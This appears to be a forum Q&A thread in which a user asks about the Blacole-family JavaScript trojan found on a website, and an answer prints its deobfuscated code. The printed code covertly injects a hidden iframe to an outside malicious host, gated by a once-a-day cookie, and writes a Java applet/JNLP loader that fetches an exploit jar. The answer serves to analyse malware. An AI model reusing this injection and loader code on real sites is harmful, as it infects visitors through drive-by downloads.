Javascript malicious injection / redirection by XML comment tags (JS/Exploit-Blacole.em)

Question

I recently came along a web site which, inside its HTML markup, had a JS Trojan embedded. The McAfee name is JS/Exploit-Blacole.em, the F-Secure name is Trojan:JS/Agent, and the MS name is Trojan:JS/Quidvetis.A.

Now, out of curiosity, I took a look at the source code of the Trojan (just for your reference, i posted a copy on pastebin, look here http://pastebin.com/PsLaE4d9).

What made me wonder is the part on the McAfee site (http://home.mcafee.com/virusinfo/virusprofile.aspx?key=1317346#none, click on the "Virus Characteristics" tab) stating

Also this detection uses the following recent injection techniques in order to make a connection to randomly generated malicious domain. <!--81a338--><!--/81a338-->

The Trojan itself seems to inject an iframe tag in the markup and load some malicious page.

Anyways, my question is, what part do those XML comment tags play? There sure must be a reason why they are mentioned in the McAfee article? Also, is it possible to somehow de-obfuscate the JS code and transform it to something human readable? Again, this is just out of curiosity. I just want to know what's happening here.

Answer 1

take a look here

http://wepawet.iseclab.org/view.php?hash=86b656e6ad9d7331acc01a80bf89c6b5&type=js

http://jsunpack.jeek.org/?report=87803db7e6a4d9d0b6190cd5054beda64e3784dd

http://urlquery.net/index.php

these tools will help you to analyze the code

this is the complete retrieved and unobfuscated code:

function r09(){
  var static = 'ajax';
  var controller = 'index.php';
  var r = document.createElement('iframe');
  r.src = 'http://ecurie80.hostzi.com/Felenne12/clik.php';
  r.style.position = 'absolute';
  r.style.color = '6675';
  r.style.height = '6675px';
  r.style.width = '6675px';
  r.style.left = '10006675';
  r.style.top = '10006675';
  if (!document.getElementById('r')){
    document.write('<p id=\'r\' class=\'r09\' ></p>');
    document.getElementById('r').appendChild(r);
  }
}
function SetCookie(cookieName, cookieValue, nDays, path){
  var today = new Date();
  var expire = new Date();
  if (nDays == null || nDays == 0)nDays = 1;
  expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name){
  var start = document.cookie.indexOf(name + "=");
  var len = start + name.length + 1;
  if ((!start) && (name != document.cookie.substring(0, name.length))){
    return null;
  }
  if (start ==  - 1)return null;
  var end = document.cookie.indexOf(";", len);
  if (end ==  - 1)end = document.cookie.length;
  return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled){
  if (GetCookie('visited_uq') == 55){
  }
  else {
    SetCookie('visited_uq', '55', '1', '/');
    r09();
  }
}

this code creates an iframe and pushes it out of the view

the code is just run once per day using a cookie

http://jsunpack.jeek.org/ is also a great tool which is used by many security researchers (like Brian Krebs?)

the Iframe loads a Java exploit and tries to run it:

 var FPLYKJoQG = {
 WdBxtaXWsGnJRm: function (PseXOSDnXPAXRRnkHZs) {
     var FIZdpsWVSgyPuFKU = document;
     FIZdpsWVSgyPuFKU.write(PseXOSDnXPAXRRnkHZs);
 },
  wWgsxtVAofesbJwDAY: function (xPTKZBm) {
     return xPTKZBm.replace(/355/g, '')
 }
}; 
var SuOmy = FPLYKJoQG.wWgsxtVAofesbJwDAY('355Ja355355355355va355355355355355355355355'); 
var CHHBPE = z.vvv( SuOmy  ).split(','); 
var BZTlEHUaD = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355j355355355n355355355355355355355355355355355355355355l355p355355355355355355355355355'); 
var ZNZXaZkfijhQTihemz = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355355355355ap355355355355355355355355pl355355355355355355355355355355e355355355355355355t'); 
if (CHHBPE[1] == 7 && CHHBPE[3] > 9) { 
 FPLYKJoQG.WdBxtaXWsGnJRm('<' + ZNZXaZkfijhQTihemz + ' height="10" width="10"><param name="' + BZTlEHUaD + '_href" value="d5xs6x0pt9tk85s.jnlp" /><param name="' + BZTlEHUaD + '_embedded" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCj&#120;qbm&#120;wIGhyZWY9ImQ1eHM2eDBwdDl0azg1cy5qbm&#120;wIiBzcGVjPSI&#120;LjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPg0KICA8aW5mb3JtYXRpb24+DQogICAgPHRpdG&#120;lPjN5ZE5NQW1PSmlLYlN&#120;RmJZMEl0THM8L3RpdG&#120;lPg0KICAgID&#120;2ZW5kb3I+VzRBcGFXZng&#120;UWwwMXRMbmR1TWFacVpzVG&#120;ISlBBVHF4anhNTWY&#120;RG41PC92ZW5kb3I+DQogIDwvaW5mb3JtYXRpb24+DQogICA8cmVzb3VyY2VzPg0KICAgICAgICA8ajJzZSBocmVmPSJodHRwOi8vamF2YS5zdW4uY29tL3Byb2R1Y3RzL2F1dG9kbC9qMnNlIiB2ZXJzaW9uPSI&#120;LjcrIiAvPg0KICAgICAgICA8amFyIGhyZWY9Ii9nb3NzaXBfdXN1YW&#120;seS5qYXIiIG1haW49InRydWUiIC8+DQogIDwvcmVzb3VyY2VzPg0KICA8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0id2pycWZzdHJ2a3d3dG&#120;nLnFqdXRnbXFodHV5cGZqbG1kc3BkYmouY2&#120;hc3MiIG5hbWU9IjB5dW1wMXB4ejlwb3kwIiBoZWlnaHQ9IjEwIiB3aWR0aD0iMTAiPg0KICAgICA8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgdmFsdWU9InRydWUiIC8+DQogIDwvYXBwbGV0LWRlc2M+DQo8L2pubHA+" /><param name="&#100;uFJfXw" value="http://aussteigende.tommeade.com:1024/sequence-backwards.txt?e=21" /></' + ZNZXaZkfijhQTihemz + '>');
} else {
 FPLYKJoQG.WdBxtaXWsGnJRm('<' + ZNZXaZkfijhQTihemz + '  height="10" code="wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class" archive="/gossip_usually.jar" width="10"><param name="&#100;uFJfXw" value="http://aussteigende.tommeade.com:1024/sequence-backwards.txt?e=21" /></' + ZNZXaZkfijhQTihemz + '>');
}

load d5xs6x0pt9tk85s.jnlp and execute it

<applet height="10" width="10"><param name="jnlp_href" value="d5xs6x0pt9tk85ss.jnlp"><param name="jnlp_embedded" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCjxqbmxwIGhyZWY9ImQ1eHM2eDBwdDl0azg1cy5qbmxwIiBzcGVjPSIxLjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPg0KICA8aW5mb3JtYXRpb24+DQogICAgPHRpdGxlPjN5ZE5NQW1PSmlLYlNxRmJZMEl0THM8L3RpdGxlPg0KICAgIDx2ZW5kb3I+VzRBcGFXZngxUWwwMXRMbmR1TWFacVpzVGxISlBBVHF4anhNTWYxRG41PC92ZW5kb3I+DQogIDwvaW5mb3JtYXRpb24+DQogICA8cmVzb3VyY2VzPg0KICAgICAgICA8ajJzZSBocmVmPSJodHRwOi8vamF2YS5zdW4uY29tL3Byb2R1Y3RzL2F1dG9kbC9qMnNlIiB2ZXJzaW9uPSIxLjcrIiAvPg0KICAgICAgICA8amFyIGhyZWY9Ii9nb3NzaXBfdXN1YWxseS5qYXIiIG1haW49InRydWUiIC8+DQogIDwvcmVzb3VyY2VzPg0KICA8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0id2pycWZzdHJ2a3d3dGxnLnFqdXRnbXFodHV5cGZqbG1kc3BkYmouY2xhc3MiIG5hbWU9IjB5dW1wMXB4ejlwb3kwIiBoZWlnaHQ9IjEwIiB3aWR0aD0iMTAiPg0KICAgICA8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgdmFsdWU9InRydWUiIC8+DQogIDwvYXBwbGV0LWRlc2M+DQo8L2pubHA+"><param name="duFJfXw" value="http://aussteigende.tommeade.coms:1024/sequence-backwards.txt?e=21"></applet>

or if this is not possible load gossip_usually.jar file and load/execute wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class:

<applet height="10" code="wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbjs.class" archive="/gossip_usuallys.jar" width="10"><param name="duFJfXw" value="http://aussteigende.tommeades.com:1024/sequence-backwards.txt?e=21"></applet>